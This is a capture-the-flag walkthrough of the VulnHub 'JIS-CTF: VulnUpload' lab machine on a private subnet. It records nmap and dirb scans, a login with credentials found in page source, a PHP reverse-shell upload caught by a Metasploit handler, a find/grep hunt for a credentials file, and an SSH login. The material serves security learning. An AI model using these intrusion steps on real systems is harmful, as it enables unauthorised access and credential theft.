Link to the VirtualBox download: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
Goal: 5 flags
Step 1: Loading my Kali and the CTF on VirtualBox.
I chose to put both on their own subnet.
Kali IP: 192.168.56.102
Step 2: Discovering CTF IP
netdiscover
CTF IP is 192.168.56.101
Step 3: Enumerating with nmap
nmap -Pn -p- -sV 192.168.56.101
Open ports:
22 ssh
80 http
Step 4: Scanning the web server
dirb http://192.168.56.101
Lots of files and directories there -let’s explore them one by one…
Step 5: Exploring /admin_area/
This is the page-
And the source shows-
That’s the second flag – so I’ve probably missed something even more obvious and write in my face!
Flag: 7412574125871236547895214
Found: #2
Looking for: #1, #3, #4, and #5
and there’s the admin username and password: 3v1l_H@ck3r
We’ll make a note of that and return to it in time…
Step 6: Exploring /flag/
Yes, I probably should have come here first – it is called “flag” !
Flag: 8734509128730458630012095
Found: #1, #2
Looking for: #3, #4, and #5
Step 7: Exploring /robots.txt/
I systematically tried loading each file – but nothing new showed up.
Step 8: Exploring /index.php
It redirects to /login.php
And yes, we can login with the creds found in Step 5
username: admin
password: 3v1l_H@ck3r
and we’re in-
The Browse button allows for an upload of any type of file, so let’s attempt to upload a php reverse shell, shall we?
Step 9: Uploading a php reverse shell
The Kali box has shell scripts stored in-
/usr/share/webshells
I changed the IP and port in the php-reverse-shell.php file-
And uploaded it successfully.
Step 10: Exploitation – firing up Metasploit
use multi/handler
set payload linux/x86/shell/reverse_tcp
set LHOST 192.168.56.102
set LPORT 55555
exploit
and browsing to /uploaded_files/php-reverse-shell.php
and yes, Metasploit gave us a shell!
lots of cd and ls commands, and finally-
cat flag.txt doesn’t work
But cat hint.txt does !
We have our third flag-
Flag: 7645110034526579012345670
Found: #1, #2, #3
Looking for: #4 and #5
and we have a hint:
“Try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉”
Step 10: Grep
After a lot of trial and error with grep, to utilize the hint and find technawi’s hidden file, I hit gold with-
$ find / -user technawi -type f 2>&1 | grep -v “Permission” | grep -v “No such”
Step 11: Inspecting /etc/mysql/cpnf.d/crendentials.txt
cat /etc/mysql/cpnf.d/crendentials.txt
Our fourth flag-
Flag: 7845658974123568974185412
Found: #1, #2, #3, #4
Looking for: #5
and credentials to open flag.txt, which presumably has the fifth and last flag
username: technawi
password: 3vilH@ksor
Step 12: SSH as technawi
Step 3 had shown us the port 22 – SSH was open.
ssh technawi@192.168.56.101
password: 3vilH@ksor
lets us in!
Step 13: Inspecting /var/www/html/flag.txt
cat /var/www/html/flag.txt
And yes, our fifth and final flag!
Flag: 5473215946785213456975249
Found: #1, #2, #3, #4, #5
All done!
If there’s one thing this CTF taught me => I definitely need to brush up on my grep!
Tool and commands used-
- nmap
- dirb
- php reverse shell
- metasploit
- grep
- ssh